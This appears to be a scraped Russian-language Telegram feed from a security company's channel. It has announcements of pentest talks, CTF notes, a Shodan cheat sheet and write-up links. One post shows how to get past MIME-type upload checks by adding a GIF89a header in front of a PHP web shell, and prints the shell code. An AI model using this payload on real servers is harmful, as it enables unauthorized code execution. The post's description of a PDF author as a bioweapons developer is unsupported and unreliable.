RESOLUTE ATTACK
6.45K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
😈Scraping директорий на Python

Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.

Читать

#Python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥176👍5
До 9к добъём?
👍34🔥12
🗣Обход загрузки файлов с использованием MIME-типа

Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.

Для этого нам нужно добавить только одну строку в начале нашего скрипта: GIF89a;

GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.

GIF89a;
<?php
system('whoami'); # shellcode goes here
?>

RESOLUTE ATTACK

#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6😍3🤣3
⚡️ Пентест 1С-БИТРИКС
Завтра в 20:00 (мск)

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥1063
🔄В начале декабря Google релизнули свои машинки формата CTF. Проект получил название H4CK1NG. Стильный интерфейс, нетривиальные решения, все это - бесплатно. Делитесь в чате своими успехами в прохождении задачек, я тоже пойду порешаю ^_^
h4ck1ng.google

E1TEX|RESOLUTE ATTACK

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👨‍💻9👍642
⚡️ Пентест 1С-БИТРИКС
УЖЕ ЧЕРЕЗ ОДИН ЧАС

В докладе мы разберём тему:
"Пентест 1С-БИТРИКС".

Разберём такие моменты как: Уязвимости и атаки на 1c-bitrix,поиск php скриптов ajax,панель разработчика,js скрипты и их секреты,фаззинг. Атаки на скрипты, поиск скрытых параметров,фаззинг параметров,тестирование на типовые уязвимости

➡️ Спикер: Сергей Кузьмин ( Firewall )
Представитель канала - https://t.me/netrunnerz

Сергей является специалистом в сфере этичного хакинга. На данный момент штатный сотрудник компании visum. Имеет опыт выступлений во внутренней структуре своей компании.

Доклад будет проходить на нашем ютуб канале

➡️ https://www.youtube.com/watch?v=c7vZUII29xs

#Тестирование #1C_Битрикс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥157👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26🤩6😍5👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥31👍84
👁‍🗨WriteUpTHM - Marketplace

Продолжаем серию WriteUp’ов
Системный администратор The Marketplace, Майкл, предоставил вам доступ к своему внутреннему серверу, чтобы вы могли протестировать платформу Marketplace, над которой он и его команда работали.

Читать

#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1610👨‍💻32👍2
searching-shodan-for-fun-and-profit.pdf
1.5 MB
Searching Shodan For Fun And Profit
(Shodan Cheat Sheet)

Расширенное руководство по Shodan на русском языке: https://t.me/RESOLUTEATTACK/368

#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
207🔥2🤩2
Интересно ли посмотрит необычные отчёты с HackerOne?
Anonymous Poll
96%
Да
4%
Нет
👍103🔥32
💻 Принципы психологического воздействия и методологии при тестировании на проникновение

Вчера нашёл очень интересную информацию от разработчика биологического оружия - Макаренко

Он, оказывается,интересуется пентестом. В пдф расписаны основные методологии тестирования на проникновение, а также принципы психологического воздействия. Будет очень полезно знать.

https://sccs.intelgr.com/archive/2020-04/02-Makarenko.pdf
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25😱7👍32